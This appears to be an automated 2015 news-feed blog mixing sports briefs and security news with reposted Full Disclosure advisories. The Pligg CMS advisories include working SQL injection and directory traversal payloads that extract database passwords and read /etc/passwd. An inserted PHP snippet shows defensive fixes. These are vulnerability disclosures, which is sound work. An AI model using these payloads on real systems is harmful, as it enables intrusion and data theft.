Saturday, October 31, 2015

Olympiakos beats Veria 2-0, keeps perfect record

ATHENS, Greece (AP) Olympiakos beat host Veria 2-0 Saturday to maintain its perfect record in the Greek league after nine rounds.

from FOX Sports Digital http://ift.tt/1iuGo3W
via IFTTT

Real Madrid concedes without Navas, but beats Las Palmas 3-1

BARCELONA, Spain (AP) Without the injured Costa Rican Keylor Navas in goal, Real Madrid on Saturday conceded its first home goal in the Spanish league, but despite numerous absences it beat newly promoted Las Palmas 3-1 to remain the only unbeaten team and stay atop the standings for another round.

from FOX Sports Digital http://ift.tt/1Wq5zCi
via IFTTT

Sydney FC tops A-League as Newcastle, Brisbane win again

SYDNEY (AP) Sydney FC beat Central Coast 3-1 to top Australian football's A-League, moving ahead of two unlikely pursuers in Newcastle and Brisbane who were also convincing winners in the weekend's fourth round.

from FOX Sports Digital http://ift.tt/1MoU4p5
via IFTTT

Saint-Etienne beats Reims 3-0 to move up to 3rd place

PARIS (AP) Saint-Etienne beat Reims 3-0 at home to move provisionally up to third place in the French league on Saturday, with all the goals coming in the second half.

from FOX Sports Digital http://ift.tt/1M34OtY
via IFTTT

Arsenal beats Swansea 3-0 in Premier League

SWANSEA, Wales (AP) Mesut Ozil set up two goals as Arsenal used a second-half barrage to beat Swansea 3-0 Saturday in the Premier League.

from FOX Sports Digital http://ift.tt/1GS5F3J
via IFTTT

Vardy scores in 8th straight Premier League game

BIRMINGHAM, England (AP) Leicester scored three goals in 20 minutes to beat West Bromwich Albion 3-2 Saturday, with England striker Jamie Vardy netting in his eighth straight Premier League game.

from FOX Sports Digital http://ift.tt/1LIRI7f
via IFTTT

Stoke holds Newcastle to 0-0 draw in Premier League

NEWCASTLE, England (AP) Goalkeeper Jack Butland made several second-half saves to help Stoke earn a 0-0 draw at Newcastle on Saturday in the Premier League.

from FOX Sports Digital http://ift.tt/1N28coX
via IFTTT

Chelsea loses again, City and Arsenal top the Premier League

LONDON (AP) Chelsea's slump in form under Jose Mourinho reached a new low on Saturday after a 3-1 loss at home to Liverpool, while Arsenal and Manchester City continued to set the pace at the summit of the Premier League.

from FOX Sports Digital http://ift.tt/1N27ec7
via IFTTT

Ighalo scores twice as Watford beats West Ham 2-0

LONDON (AP) Odion Ighalo scored twice to guide Watford to a 2-0 victory against West Ham on Saturday in the Premier League at Vicarage Road.

from FOX Sports Digital http://ift.tt/1N257oS
via IFTTT

Real Madrid beats Las Palmas 3-1, stays atop Spanish league

MADRID (AP) Cristiano Ronaldo scored his 13th goal of the season as Real Madrid defeated Las Palmas 3-1 Saturday to remain atop the Spanish league standings.

from FOX Sports Digital http://ift.tt/1MoGSjS
via IFTTT

Dortmund wins 3-1 in Bremen, cuts Bayern's Bundesliga lead

FRANKFURT, Germany (AP) Henrikh Mkhitaryan scored one goal and set up two despite being hit by an object thrown from the stands before the match to help Borussia Dortmund win 3-1 at Werder Bremen in the Bundesliga on Saturday.

from FOX Sports Digital http://ift.tt/1MoGRfL
via IFTTT

CSKA extends lead in Russia as Zenit fails to win

MOSCOW (AP) CSKA Moscow extended its unbeaten start to the Russian Premier League season to 15 games with a 2-0 home win over FC Ufa on Saturday, while reigning champion Zenit St. Petersburg missed out on a chance to snatch second place.

from FOX Sports Digital http://ift.tt/1M7KATe
via IFTTT

Hacking Team Offering Encryption Cracking Tools to Law Enforcement Agencies

Hacking Team, the infamous Italy-based spyware company that had more than 400 GB of its confidential information stolen earlier this year, has resumed its operations and started pitching new hacking tools to help US law enforcement get around their encryption issues. Yes, Hacking Team is back with a new set of Encryption Cracking Tools for government agencies as well as other customers to


from The Hacker News http://ift.tt/1HishoT
via IFTTT

Free Ransomware Decryption Tool — CoinVault and Bitcryptor

Have you been infected with the insidious CoinVault or Bitcryptor ransomware? If so, there is some potentially good news for you. You may now recover your encrypted files for FREE! – Thanks to the efforts of Dutch police and antivirus maker Kaspersky Lab. Security researchers from Kaspersky Lab and the Dutch Public Prosecution Service have obtained and published the last set of


from The Hacker News http://ift.tt/1MyKAOf
via IFTTT

The Witch Head Nebula


Double, double toil and trouble; Fire burn, and cauldron bubble .... maybe Macbeth should have consulted the Witch Head Nebula. A frighteningly shaped reflection nebula, this cosmic crone is about 800 light-years away though. Its malevolent visage seems to glare toward nearby bright star Rigel in Orion, just off the right edge of this frame. More formally known as IC 2118, the interstellar cloud of dust and gas is nearly 70 light-years across, its dust grains reflecting Rigel's starlight. In this composite portrait, the nebula's color is caused not only by the star's intense bluish light but because the dust grains scatter blue light more efficiently than red. The same physical process causes Earth's daytime sky to appear blue, although the scatterers in planet Earth's atmosphere are molecules of nitrogen and oxygen. via NASA http://ift.tt/1WnLsog

The anonymous Doge

Tinkercad user The anonymous Doge. I love chewing bones! My name's not going to be told, and I make phone and tablet cases at request. The price ...

from Google Alert - anonymous http://ift.tt/1NHi0at
via IFTTT

Antarctic Mass Change from GRACE derived Gravity Observations: Jan 2004 - Jun 2014

GRACE, NASA's Gravity Recovery and Climate Experiment, consists of twin co-orbiting satellites that fly in a near polar orbit separated by a distance of 220 km. GRACE precisely measures the distance between the two spacecraft in order to make detailed measurements of the Earth's gravitational field. Since its launch in 2002, GRACE has provided a continuous record of changes in the mass of the Earth's ice sheets. These animations show the change in the mass of the Antarctic Ice Sheet between January 2004 and June 2014 as measured by the pair of GRACE satellites. The 1-arc-deg NASA GSFC mascon solution data was resampled to a 5130 x 5130 data array using Kriging interpolation. A color scale was applied where blue values indicate an increase in the ice sheet mass while red shades indicate a decrease. In addition, a graph overlay shows the running total of the accumulated mass change in gigatons. Four separate animations are shown here: one of the full Antarctic Ice Sheet (above) and three of individual regional views (below) showing the regions of West Antarctica, the Antarctic Peninsula and East Antarctica. The time-series of each region is shown with a graph depicting the ice loss for the region alone. Note that the range on the color scale is different for each regional view in order to portray the most detail possible. Areas outside the region being shown are colored in a pale green to indicate that it is not included in the view. The floating ice shelves, shown in a lighter shade of green, are also not included. Technical Note: The glacial isostatic adjustment signal (Earth mass redistribution in response to historical ice loading) has been removed using the ICE-6G model (Peltier et al. 2015).

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1M20sDi
via IFTTT

Friday, October 30, 2015

Marketing firm implicated in FIFA scandal sells soccer team

CARY, N.C. (AP) A sports marketing firm implicated in an investigation into corruption in world soccer has sold its North American Soccer League team.

from FOX Sports Digital http://ift.tt/1REerTe
via IFTTT

Bayern's 10-game winning start to Bundesliga comes to an end

BERLIN (AP) Eintracht Frankfurt ended Bayern Munich's record 10-game winning start to the Bundesliga by holding the German league leader 0-0 on Friday.

from FOX Sports Digital http://ift.tt/1NGB20I
via IFTTT

Deportivo draws with Atletico Madrid in Spain

MADRID (AP) Atletico Madrid squandered a chance to provisionally go top of the Spanish league when poor defending allowed Deportivo La Coruna to draw 1-1 Friday in the 10th round.

from FOX Sports Digital http://ift.tt/1GPXEw9
via IFTTT

Di Maria scores as French leader PSG wins 1-0 at Rennes

PARIS (AP) Angel Di Maria struck the winner as French league leader Paris Saint-Germain won 1-0 at Rennes on Friday to maintain its unbeaten start to the season.

from FOX Sports Digital http://ift.tt/1GPXCEy
via IFTTT

Bayern's 10-game winning start to Bundesliga ends

BERLIN (AP) Eintracht Frankfurt ended Bayern Munich's record 10-game winning start to the Bundesliga by holding the German league leader to a 0-0 draw on Friday.

from FOX Sports Digital http://ift.tt/1GPVAEy
via IFTTT

Ravens: S Matt Elam, a 2013 1st-round pick, has been suspended 1 game for violating NFL's substance abuse policy (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Chelsea lawyers will defend Brazil's Piazon

RIO DE JANEIRO (AP) Two lawyers from English Premier League champion Chelsea will defend soccer player Lucas Piazon from sexual assault charges he's facing in Canada.

from FOX Sports Digital http://ift.tt/1Oe5d2n
via IFTTT

Ravens: WR Steve Smith (knee) officially listed as probable for Sunday's game vs. Chargers (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

sindresorhus/ava

sindresorhus changed the title from Don't show title when there only one anonymous test to Don't show title when there's only one anonymous test 15 ...

from Google Alert - anonymous http://ift.tt/1Q03b5g
via IFTTT

CryptoWall Ransomware raised $325 Million in Revenue for Its Developer

The Creators of the notorious CryptoWall ransomware virus have managed to raise more than $325 million (£212 million) in this past year alone. Ransomware has emerged as one of the biggest cyber threats to web users in recent times. Typically, hackers primarily gain access to a user's computer system using a ransomware malware, which encrypts all files with a strong cryptographic


from The Hacker News http://ift.tt/1NFTM0p
via IFTTT

TalkTalk Hack: Police Arrest Second Teenager in London

British Police have arrested a second teenage boy in relation to the major hack on the servers of UK-based telco 'TalkTalk' last week. On Monday, a 15-year-old boy (first arrest) from County Antrim, Northern Ireland, was arrested in connection with the TalkTalk Data Breach. On Thursday, The Metropolitan Police Cyber Crime Unit (MPCCU) arrested this second unnamed


from The Hacker News http://ift.tt/1MmIUkH
via IFTTT

Feature-Based Diversity Optimization for Problem Instance Classification. (arXiv:1510.08568v1 [cs.NE])

Understanding the behaviour of heuristic search methods is a challenge. This even holds for simple local search methods such as 2-OPT for the Traveling Salesperson problem. In this paper, we present a general framework that is able to construct a diverse set of instances that are hard or easy for a given search heuristic. Such a diverse set is obtained by using an evolutionary algorithm for constructing hard or easy instances that are diverse with respect to different features of the underlying problem. Examining the constructed instance sets, we show that many combinations of two or three features give a good classification of the TSP instances in terms of whether they are hard to be solved by 2-OPT.



from cs.AI updates on arXiv.org http://ift.tt/20exidO
via IFTTT

Swiss bank cooperating with US, Swiss probes of FIFA

ZURICH (AP) Credit Suisse says it is helping American and Swiss federal investigations into alleged financial corruption linked to FIFA.

from FOX Sports Digital http://ift.tt/1ipHfCZ
via IFTTT

Blatter casts further doubt on integrity of World Cup votes

LONDON (AP) Sepp Blatter has cast further doubt on the integrity of World Cup votes, blaming Michel Platini for scuppering an agreement to award the 2022 tournament to the United States and suggesting Qatar benefited from collusion.

from FOX Sports Digital http://ift.tt/1NENVIS
via IFTTT

Mission '1 Billion' — Microsoft will Automatically Offer Windows 10 Upgrade

Microsoft wholeheartedly wants you to upgrade your PCs to Windows 10, so much so that the company plans to automatically download its new operating system to Windows 7/8 computers next year. Just two weeks ago, Microsoft accidentally pushed Windows 10 installation to Windows 7 and Windows 8/8.1 users through the Windows Update process, but next year the company will do it on purpose.


from The Hacker News http://ift.tt/1kXYhtK
via IFTTT

Tor Releases Anonymous Instant Messenger. Here's How to Use It

The Tor Project has officially launched the first beta version of Tor Messenger, an open source and Encrypted instant messaging client that works on top of the Tor network. Tor Messenger is designed by keeping both simplicity and privacy in mind. The team claimed that their app encrypts the content of instant messages as well as makes it very difficult for snoopers and eavesdroppers to


from The Hacker News http://ift.tt/20feifl
via IFTTT

Ocean City, MD's surf is Good

October 29, 2015 at 07:00PM, the surf is Good!

Ocean City, MD Summary


Surf: shoulder high to 1 ft overhead
Maximum: 1.836m (6.02ft)
Minimum: 1.224m (4.02ft)

Maryland-Delaware Summary


from Surfline http://ift.tt/1kVmigH
via IFTTT

[FD] Arbitrary code execution resp. escalation of privilege with Mozilla's SETUP.EXE

[FD] Xen VM Escape

Xen XSA-148 (http://ift.tt/1Wlm0Q9) is the real VM Escape Vulnerability. XSA-148 is public just now and it's a memory management logic vulnerability obviously. The bulletin means that a malicious PV DomU could enable the PS/RW flag of its PDE to read/write the 2M page. So, if an attacker prepares a page table at the 2M page, he could use the vulnerability to modify the PT. Finally, this vulnerability changes to an arbitrary machine memory read/write vulnerability.

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability

1. ADVISORY INFORMATION

Title: Oracle E-Business Suite XXE injection
Advisory ID: [ERPSCAN-15-030]
Advisory URL: http://ift.tt/1LZDL2x
Date published: 20.10.2015
Vendors contacted: Oracle

2. VULNERABILITY INFORMATION

Class: XML External Entity [CWE-611]
Impact: information disclosure, DoS, SSRF, NTLM relay
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-4851

CVSS Information

CVSS Base Score: 6.8 / 10
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) Medium (M)
Au : Authentication (Level of authentication needed to exploit) None (N)
C : Impact to Confidentiality Partial (P)
I : Impact to Integrity Partial (P)
A : Impact to Availability Partial (P)

3. VULNERABILITY DESCRIPTION

1) An attacker can read an arbitrary file on a server by sending a correct XML request with a crafted DTD and reading the response from the service.
2) An attacker can perform a DoS attack (for example, XML Entity Expansion).
3) An SMB Relay attack is a type of Man-in-the-Middle attack where the attacker asks the victim to authenticate into a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways and gets access.

4. VULNERABLE PACKAGES

Oracle E-Business Suite 12.1.3
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS

Install Oracle CPU October 2015

6. AUTHOR

Nikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)

7. TECHNICAL DESCRIPTION

Vulnerable servlet: /OA_HTML/oramipp_lpr

8. REPORT TIMELINE

Reported: 17.07.2015
Vendor response: 24.07.2015
Date of Public Advisory: 20.10.2015

9. REFERENCES

http://ift.tt/1QLXHJH
http://ift.tt/1LZDL2x

10. ABOUT ERPScan Research

The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.

11. ABOUT ERPScan

ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.

Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability

1. ADVISORY INFORMATION

Title: Oracle E-Business Suite - XXE injection
Advisory ID: [ERPSCAN-15-029]
Advisory URL: http://ift.tt/1Wju5u4
Date published: 21.10.2015
Vendors contacted: Oracle

2. VULNERABILITY INFORMATION

Class: XML External Entity [CWE-611]
Impact: information disclosure, DoS, SSRF, NTLM relay
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-4849

CVSS Information

CVSS Base Score: 6.8 / 10
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) Medium (M)
Au : Authentication (Level of authentication needed to exploit) None (N)
C : Impact to Confidentiality Partial (P)
I : Impact to Integrity Partial (P)
A : Impact to Availability Partial (P)

3. VULNERABILITY DESCRIPTION

1) An attacker can read an arbitrary file on a server by sending a correct XML request with a crafted DTD and reading the response from the service.
2) An attacker can perform a DoS attack (for example, XML Entity Expansion).
3) An SMB Relay attack is a type of Man-in-the-Middle attack where the attacker asks the victim to authenticate into a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways and gets access.

4. VULNERABLE PACKAGES

Oracle E-Business Suite 12.1.3
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS

Install Oracle CPU October 2015

6. AUTHOR

Nikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)

7. TECHNICAL DESCRIPTION

Vulnerable servlet: /OA_HTML/IspPunchInServlet

8. REPORT TIMELINE

Reported: 17.07.2015
Vendor response: 24.07.2015
Date of Public Advisory: 20.10.2015

9. REFERENCES

http://ift.tt/1QLXHJH
http://ift.tt/1Wju5u4

10. ABOUT ERPScan Research

The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications.

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability

1. ADVISORY INFORMATION

Title: Oracle E-Business Suite XXE injection
Advisory ID: [ERPSCAN-15-028]
Advisory URL: http://ift.tt/1Wju5u2
Date published: 20.10.2015
Vendors contacted: Oracle

2. VULNERABILITY INFORMATION

Class: XML External Entity [CWE-611]
Impact: information disclosure, DoS, SSRF, NTLM relay
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-4886

CVSS Information

CVSS Base Score: 6.4 / 10
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) Low (L)
Au : Authentication (Level of authentication needed to exploit) None (N)
C : Impact to Confidentiality Partial (P)
I : Impact to Integrity Partial (P)
A : Impact to Availability None (N)

3. VULNERABILITY DESCRIPTION

1) An attacker can read an arbitrary file on a server by sending a correct XML request with a crafted DTD and reading the response from the service.
2) An attacker can perform a DoS attack (for example, XML Entity Expansion).
3) An SMB Relay attack is a type of Man-in-the-Middle attack where the attacker asks the victim to authenticate into a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways and gets access.

4. VULNERABLE PACKAGES

Oracle E-Business Suite 12.1.3
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS

Install Oracle CPU October 2015

6. AUTHOR

Nikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)

7. TECHNICAL DESCRIPTION

Vulnerable servlet: /OA_HTML/copxml

8. REPORT TIMELINE

Reported: 17.07.2015
Vendor response: 24.07.2015
Date of Public Advisory: 20.10.2015

9. REFERENCES

http://ift.tt/1QLXHJH
http://ift.tt/1Wju5u2

10. ABOUT ERPScan Research

The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications.

Source: Gmail -> IFTTT-> Blogger

Google is Merging its Chrome OS with Android

Google is planning to merge its Chrome OS with Android operating system and roll out a single operating system by 2017. New Android OS Optimized for Laptops: Yes, a Single Operating system for Mobile devices, desktops, laptops and notebooks, just what Microsoft is offering to its users with Windows 10. Chrome OS is a lightweight operating system based on the Linux


from The Hacker News http://ift.tt/1MYG0TU
via IFTTT

[FD] Pligg CMS 2.0.2: Multiple SQL Injections

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pligg.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

There are multiple SQL Injection vulnerabilities in Pligg CMS 2.0.2. One of them does not require any credentials, and allows the direct extraction of data from the database.

3. SQL Injection

Description

Pligg CMS is vulnerable to SQL injection. It is possible to extract data from all databases that the pligg database user has access to. Credentials are not required.

Proof Of Concept

    http://localhost//pligg-cms-master/story.php?title=google-blabla&reply=1&comment_id=1%20union%20all%20select%201,1,1,1,1,1,1,password,password,1%20from%20mysql.user%20%23

Code

    /story.php:168
    if(isset($_GET['reply']) && !empty($parent_comment_id)){
        $main_smarty->assign('the_comments', get_comments(true,0,$_GET['comment_id']));
        $main_smarty->assign('parrent_comment_id',$parent_comment_id);
    }
    [...]
    function get_comments ($fetch = false, $parent = 0, $comment_id=0, $show_parent=0){
        Global $db, $main_smarty, $current_user, $CommentOrder, $link, $cached_comments;

        //Set comment order to 1 if it's not set in the admin panel
        if (isset($_GET['comment_sort'])) setcookie('CommentOrder', $CommentOrder = $_GET['comment_sort'], time()+60*60*24*180);
        elseif (isset($_COOKIE['CommentOrder'])) $CommentOrder = $_COOKIE['CommentOrder'];

        if (!isset($CommentOrder)) $CommentOrder = 1;
        If ($CommentOrder == 1){$CommentOrderBy = "comment_votes DESC, comment_date DESC";}
        If ($CommentOrder == 2){$CommentOrderBy = "comment_date DESC";}
        If ($CommentOrder == 3){$CommentOrderBy = "comment_votes ASC, comment_date DESC";}
        If ($CommentOrder == 4){$CommentOrderBy = "comment_date ASC";}
        [...]
        $comments = $db->get_results("SELECT * FROM " . table_comments . " WHERE (comment_status='published' $status_sql) AND comment_link_id=$link->id AND comment_id = $comment_id ORDER BY " . $CommentOrderBy);

4. Blind SQL Injection (Admin Area)

Description

There is a blind SQL Injection in the admin area of Pligg CMS. This allows an attacker who has gained admin credentials to extract data from the database.

The problem exists because the index of the submitted "enabled" POST array is used in a query. The value is escaped, so quotes cannot be used in the injection, but the query does not place the value between quotes.

Proof Of Concept

    POST /pligg-cms-master/admin/admin_users.php HTTP/1.1

    frmsubmit=userlist&admin_acction=2&token=VALID_CSRF_TOKEN&all1=on&enabled[2 AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23]=1

Code

    // admin/admin_users.php
    foreach($_POST["enabled"] as $id => $valuea) {
        $_GET['id'] = $id = $db->escape($id);
        $user= $db->get_row('SELECT * FROM ' . table_users ." where user_id=$id");

5. Possible SQL Injection

Description

The upload module is vulnerable to Blind SQL Injection via the "comment" as well as "id" parameter.

The module seems to be unused at the moment, but if it were to be used in the future, or if an attacker finds a different way to execute it, it would be vulnerable.

The requests to trigger the vulnerabilities would be:

    POST http://localhost/pligg-cms-master/modules/upload/upload.php
    id=1&number=1&comment=1' AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23

    POST http://localhost/pligg-cms-master/modules/upload/upload.php
    id=1&number=1&comment=1

Code

    ./modules/upload/upload.php:
    if ($_POST['id']) {
        $linkres=new Link;
        $linkres->id = sanitize($_POST['id'], 3);
        if(!is_numeric($linkres->id)) die("Wrong ID");
        if(!is_numeric($_POST['number']) || $_POST['number']<=0) die("Wrong number");
        if($_POST['number'] > get_misc_data('upload_maxnumber')) die("Too many files");

        // Remove old file and thumbnails with same number
        $sql = "SELECT * FROM ".table_prefix."files WHERE ".($isadmin ? "" : "file_user_id='{$current_user->user_id}' AND")." file_link_id='{$_POST['id']}' AND file_number='{$_POST['number']}' AND file_comment_id='$_POST[comment]'";

The first problem is that $_POST[comment] is never sanitized.

The second problem is that $_POST['id'] is first sanitized by removing tags, then that sanitized result is checked for being numeric, and finally the original POST value is used in the query. Because of this, it is possible to put the injection inside tags to bypass the check.

6. Solution

This issue was not fixed by the vendor.

7. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been sent to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public

Blog Reference: http://ift.tt/1M4uxWr

Source: Gmail -> IFTTT-> Blogger
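The three query patterns in the SQL injection advisory above fail for the same reason: request data reaches the SQL text without being bound or strictly typed. The following is an added example, not Pligg code and not part of the advisory; it shows the hardened counterpart of each pattern, assuming PDO with an in-memory SQLite database, a constructed schema, and hypothetical helper names (strict_int, get_comment, enabled_user_ids, upload_lookup_params).

```php
<?php
declare(strict_types=1);

// Constructed schema and rows so the script runs offline (SQLite in memory).
// Column names follow the advisory's excerpts; everything else is assumed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE comments (comment_id INTEGER PRIMARY KEY, comment_link_id INTEGER,
            comment_status TEXT, comment_votes INTEGER, comment_date TEXT, comment_content TEXT)");
$pdo->exec("INSERT INTO comments VALUES (1, 10, 'published', 3, '2015-10-01', 'first'),
                                        (2, 10, 'published', 5, '2015-10-02', 'second')");

// Fixed ORDER BY fragments: request data only ever selects a key, never SQL text.
const COMMENT_ORDER = [
    1 => 'comment_votes DESC, comment_date DESC',
    2 => 'comment_date DESC',
    3 => 'comment_votes ASC, comment_date DESC',
    4 => 'comment_date ASC',
];

/** Return $raw as an int >= $min, or null. Unlike is_numeric(), this rejects
 *  "1e3", "1.5", markup-wrapped values and arrays such as id[]=1. */
function strict_int($raw, int $min = 1): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => $min]]);
    return $v === false ? null : $v;
}

/** Section 3 pattern: comment_id is validated, then bound as an integer. */
function get_comment(PDO $pdo, int $linkId, $rawCommentId, $rawOrder): array
{
    $commentId = strict_int($rawCommentId);
    if ($commentId === null) {
        return [];                              // reject instead of concatenating
    }
    $orderBy = COMMENT_ORDER[strict_int($rawOrder) ?? 1] ?? COMMENT_ORDER[1];
    $stmt = $pdo->prepare(
        "SELECT comment_id, comment_content FROM comments
          WHERE comment_status = 'published'
            AND comment_link_id = :link AND comment_id = :cid
          ORDER BY $orderBy"                    // value comes from the fixed map above
    );
    $stmt->bindValue(':link', $linkId, PDO::PARAM_INT);
    $stmt->bindValue(':cid', $commentId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Section 4 pattern: the keys of a submitted array are request data as well.
 *  Escaping does not help when the value sits in the query unquoted. */
function enabled_user_ids(array $enabled): array
{
    $ids = [];
    foreach (array_keys($enabled) as $key) {
        $id = strict_int($key);
        if ($id !== null) {
            $ids[] = $id;                       // bind these as PDO::PARAM_INT
        }
    }
    return $ids;
}

/** Section 5 pattern: validate a value and use that same validated value.
 *  Assumption: a comment id of 0 means "no comment", so 0 is allowed there. */
function upload_lookup_params(array $post): ?array
{
    $id      = strict_int($post['id'] ?? null);
    $number  = strict_int($post['number'] ?? null);
    $comment = strict_int($post['comment'] ?? null, 0);
    if ($id === null || $number === null || $comment === null) {
        return null;
    }
    return ['id' => $id, 'number' => $number, 'comment' => $comment];
}

// Constructed inputs: one well-formed id and three malformed ones.
foreach (['1', '1 union all select 1', '<i>1</i>', '1e3'] as $raw) {
    printf("%-24s -> %d row(s)\n", $raw, count(get_comment($pdo, 10, $raw, '2')));
}
echo json_encode(enabled_user_ids(['2' => '1', '2 AND 1=1' => '1', '7' => '1'])), "\n";
var_export(upload_lookup_params(['id' => '<i>1</i>', 'number' => '1', 'comment' => '1']));
echo "\n";
var_export(upload_lookup_params(['id' => '1', 'number' => '1', 'comment' => '0']));
echo "\n";
```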

[FD] Pligg CMS 2.0.2: Directory Traversal

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pligg.com/
Vulnerability Type: Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

The editor delivered with Pligg CMS is vulnerable to directory traversal, which gives an attacker who has obtained admin credentials the opportunity to view any file stored on the webserver that the webserver user has access to.

Please note that admin credentials are required.

3. Proof of Concept

    POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1

    the_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&open=Open

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been sent to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public

Blog Reference: http://ift.tt/1M4uzxo

Source: Gmail -> IFTTT-> Blogger

[FD] Pligg CMS 2.0.2: Code Execution & CSRF

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pligg.com/
Vulnerability Type: Code Execution & CSRF
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

The file editor provides the possibility to edit .tpl files stored in the templates directory.

But the file editor is vulnerable to directory traversal when saving files, and it does not check the submitted filename against a whitelist of allowed files. It also does not check the file extension. Because of this, it is possible to gain code execution.

Admin credentials are required to access the file editor, but the request does not have CSRF protection, so an attacker can gain code execution by getting the admin to visit a website they control while logged in.

3. Proof of Concept

    POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1

